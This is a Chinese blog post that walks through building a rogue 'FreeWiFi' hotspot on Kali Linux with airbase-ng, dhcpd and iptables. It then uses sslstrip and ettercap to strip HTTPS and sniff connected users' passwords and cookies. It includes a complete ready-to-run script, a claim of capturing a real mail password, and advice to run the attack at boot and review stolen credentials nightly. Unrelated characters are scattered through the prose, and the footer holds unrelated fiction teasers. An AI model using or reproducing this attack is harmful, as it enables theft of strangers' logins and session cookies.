Kali-Linux下創(chuàng)建一個釣魚WiFi熱點(diǎn)

之前寫過kali-linux下用 HostAPd+bridge-utils 搭建網(wǎng)橋的方式來創(chuàng)建wifi熱點(diǎn)的日志,有興趣可以在看下不同:

Kali-linux下使用HostAPd創(chuàng)建wifi熱點(diǎn)(AP) - 簡書

這里再介紹一種方法敬扛,是使用 airbase-ng + dhcpd 創(chuàng)建虛擬WiFi熱點(diǎn)泄私;順便使用 sslstrip+ettercap 進(jìn)行中間人攻擊则涯,嗅探使用者的上網(wǎng)信息和劫持cookie瞭吃!

所需要的軟件如下嗜憔;kali-linux都已經(jīng)自帶了木缝,其他的系統(tǒng)可以自行安裝:

Aircrack-ng 套件#用來發(fā)送數(shù)據(jù)

isc-dhcp-server#簡單的dhcp服務(wù)器

sslstrip#突破ssl加密

ettercap#嗅探劫持

leaf /etc/dhcp/dhcpd.conf編輯dhcp服務(wù)器配置文件便锨,修改如下:

authoritative;

default-lease-time700;

max-lease-time8000;

subnet10.0.0.0netmask255.255.255.0{

option routers10.0.0.1;

option subnet-mask255.255.255.0;

option domain-name"FreeWiFi";

option domain-name-servers10.0.0.1;

range10.0.0.1010.0.0.100;

}

然后激活網(wǎng)卡至監(jiān)聽模式:

airmon-ng start wlan0

airbase-ng -e FreeWiFi -c 6 mon0

此時(shí)虛擬wifi的信號已經(jīng)發(fā)送出去了,如果出現(xiàn)錯誤:

Error: Got channel -1, expected a value > 0.

執(zhí)行如下命令:

airmon-ng stop mon0

ifconfig wlan0 down

iwconfig wlan0 mode monitor

ifconfig wlan0 up

然后從激活網(wǎng)卡至監(jiān)聽模式那里重新開始我碟。

接著執(zhí)行如下命令:

ifconfig at0 up

ifconfig at010.0.0.1netmask255.255.255.0

ifconfig at0 mtu1400

route add-net10.0.0.0netmask255.255.255.0gw10.0.0.1

iptables--flush

iptables--table nat--flush

iptables--delete-chain

iptables--table nat--delete-chain

echo1>/proc/sys/net/ipv4/ip_forward

iptables-t nat-A PREROUTING-p udp-j DNAT--to192.168.1.1

iptables-P FORWARD ACCEPT

iptables--append FORWARD--in-interfaceat0-j ACCEPT

iptables--table nat--append POSTROUTING--out-interfaceeth0-j MASQUERADE

iptables-t nat-A PREROUTING-p tcp--destination-port80-j REDIRECT--to-port10000

dhcpd-cf/etc/dhcp/dhcpd.conf-pf/var/run/dhcpd.pid at0

/etc/init.d/isc-dhcp-server start

虛擬WiFir熱點(diǎn)創(chuàng)建成功放案,接下來就是嗅探欺騙釣魚了:

sslstrip-fpk10000

ettercap-Tpuqiat0

然后就等著魚兒上鉤吧!

手機(jī)上測試了下矫俺,網(wǎng)易郵箱直接明文密碼:

百度使用了加密:

寫了一個腳本吱殉,修改成自己的設(shè)置每次執(zhí)行就ok了:

復(fù)制下面代碼,保存為 “Fake_a_ap.sh”厘托,然后 chmod +x Fake_a_ap.sh && ./Fake_a_ap.sh

#!/bin/sh

echo "即將創(chuàng)建WiFi熱點(diǎn)友雳,請確保dhcpd.conf已經(jīng)配置好!" &

sleep5

ifconfig wlan0 down#wlan0修改成你的網(wǎng)卡

iwconfig wlan0 mode monitor

ifconfig wlan0 up

airmon-ng start wlan0&

sleep5

airbase-ng-eFreeWiFi-c6mon0&#修改成自己的熱點(diǎn)名稱和信道

sleep5

ifconfig at0 up

ifconfig at010.0.0.1netmask255.255.255.0

ifconfig at0 mtu1400

route add-net10.0.0.0netmask255.255.255.0gw10.0.0.1

iptables--flush&&iptables--table nat--flush&&iptables--table nat--flush&&iptables--table nat--delete-chain&

echo1>/proc/sys/net/ipv4/ip_forward

iptables-t nat-A PREROUTING-p udp-j DNAT--to192.168.1.1

iptables-P FORWARD ACCEPT

iptables--append FORWARD--in-interfaceat0-j ACCEPT

iptables--table nat--append POSTROUTING--out-interfaceeth0-j MASQUERADE

iptables-t nat-A PREROUTING-p tcp--destination-port80-j REDIRECT--to-port10000

dhcpd-cf/etc/dhcp/dhcpd.conf-pf/var/run/dhcpd.pid at0

sleep2

/etc/init.d/isc-dhcp-server start&

sleep5

sslstrip-fpk10000&

ettercap-puTqi at0

當(dāng)然還可以更加淫蕩铅匹!簡單Ettercap 使用進(jìn)階(1):詳細(xì)參數(shù):設(shè)置成將數(shù)據(jù)包保存到本地押赊,然后再把這個腳本添加到“啟動應(yīng)用程序”里或者Kali-linux 定時(shí)執(zhí)行任務(wù)Crontab的簡單設(shè)置 - 簡書,讓它隨系統(tǒng)啟動包斑,流礁,,然后就沒有然后了:每天睡覺前打開數(shù)據(jù)包檢查下里面的username罗丰,passwd神帅,cookie,丸卷,etc枕稀,,谜嫉,萎坷,

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末,一起剝皮案震驚了整個濱河市沐兰,隨后出現(xiàn)的幾起案子哆档,更是在濱河造成了極大的恐慌,老刑警劉巖住闯,帶你破解...
    沈念sama閱讀 218,941評論 6 508
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件瓜浸,死亡現(xiàn)場離奇詭異澳淑,居然都是意外死亡,警方通過查閱死者的電腦和手機(jī)插佛,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 93,397評論 3 395
  • 文/潘曉璐 我一進(jìn)店門杠巡,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人雇寇,你說我怎么就攤上這事氢拥。” “怎么了锨侯?”我有些...
    開封第一講書人閱讀 165,345評論 0 356
  • 文/不壞的土叔 我叫張陵嫩海,是天一觀的道長。 經(jīng)常有香客問我囚痴,道長叁怪,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 58,851評論 1 295
  • 正文 為了忘掉前任深滚,我火速辦了婚禮奕谭,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘成箫。我一直安慰自己展箱,他們只是感情好,可當(dāng)我...
    茶點(diǎn)故事閱讀 67,868評論 6 392
  • 文/花漫 我一把揭開白布蹬昌。 她就那樣靜靜地躺著,像睡著了一般攀隔。 火紅的嫁衣襯著肌膚如雪皂贩。 梳的紋絲不亂的頭發(fā)上,一...
    開封第一講書人閱讀 51,688評論 1 305
  • 那天昆汹,我揣著相機(jī)與錄音明刷,去河邊找鬼。 笑死满粗,一個胖子當(dāng)著我的面吹牛辈末,可吹牛的內(nèi)容都是我干的。 我是一名探鬼主播映皆,決...
    沈念sama閱讀 40,414評論 3 418
  • 文/蒼蘭香墨 我猛地睜開眼挤聘,長吁一口氣:“原來是場噩夢啊……” “哼!你這毒婦竟也來了捅彻?” 一聲冷哼從身側(cè)響起组去,我...
    開封第一講書人閱讀 39,319評論 0 276
  • 序言:老撾萬榮一對情侶失蹤,失蹤者是張志新(化名)和其女友劉穎步淹,沒想到半個月后从隆,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體诚撵,經(jīng)...
    沈念sama閱讀 45,775評論 1 315
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 37,945評論 3 336
  • 正文 我和宋清朗相戀三年键闺,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了寿烟。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點(diǎn)故事閱讀 40,096評論 1 350
  • 序言:一個原本活蹦亂跳的男人離奇死亡辛燥,死狀恐怖韧衣,靈堂內(nèi)的尸體忽然破棺而出,到底是詐尸還是另有隱情购桑,我是刑警寧澤畅铭,帶...
    沈念sama閱讀 35,789評論 5 346
  • 正文 年R本政府宣布,位于F島的核電站勃蜘,受9級特大地震影響硕噩,放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜缭贡,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 41,437評論 3 331
  • 文/蒙蒙 一炉擅、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧阳惹,春花似錦谍失、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,993評論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽。三九已至纲岭,卻和暖如春抹竹,著一層夾襖步出監(jiān)牢的瞬間,已是汗流浹背止潮。 一陣腳步聲響...
    開封第一講書人閱讀 33,107評論 1 271
  • 我被黑心中介騙來泰國打工窃判, 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留,地道東北人喇闸。 一個月前我還...
    沈念sama閱讀 48,308評論 3 372
  • 正文 我出身青樓袄琳,卻偏偏與公主長得像,于是被迫代替她去往敵國和親燃乍。 傳聞我的和親對象是個殘疾皇子唆樊,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 45,037評論 2 355

推薦閱讀更多精彩內(nèi)容

  • 1.安全技術(shù) (1)入侵檢測與管理系統(tǒng)(Intrusion Detection Systems): 特點(diǎn)是不阻斷任...
    尛尛大尹閱讀 2,469評論 0 2
  • 當(dāng)搭建完openstack之后,在創(chuàng)建instance之前橘沥,第一件事情就是創(chuàng)建network窗轩,一個經(jīng)典的流程如下:...
    ximitc閱讀 1,153評論 0 0
  • 本文整理了在實(shí)踐過程中使用的Linux網(wǎng)絡(luò)工具,這些工具提供的功能非常強(qiáng)大座咆,我們平時(shí)使用的只是冰山一角痢艺,比如lso...
    老夫劉某閱讀 3,526評論 0 7
  • 防火墻的概念iptables的簡介iptables命令網(wǎng)絡(luò)防火墻NATfirewalld服務(wù) 一仓洼、防火墻的概念 (...
    哈嘍別樣閱讀 1,823評論 0 1
  • 好久沒給家里打電話,晚上給奶奶聊天堤舒,奶奶說:“有時(shí)間給你爸視頻色建,勸他多注意身體,他最近又開始鬧肚子了舌缤,我們說不管用...
    cherry8843閱讀 359評論 4 1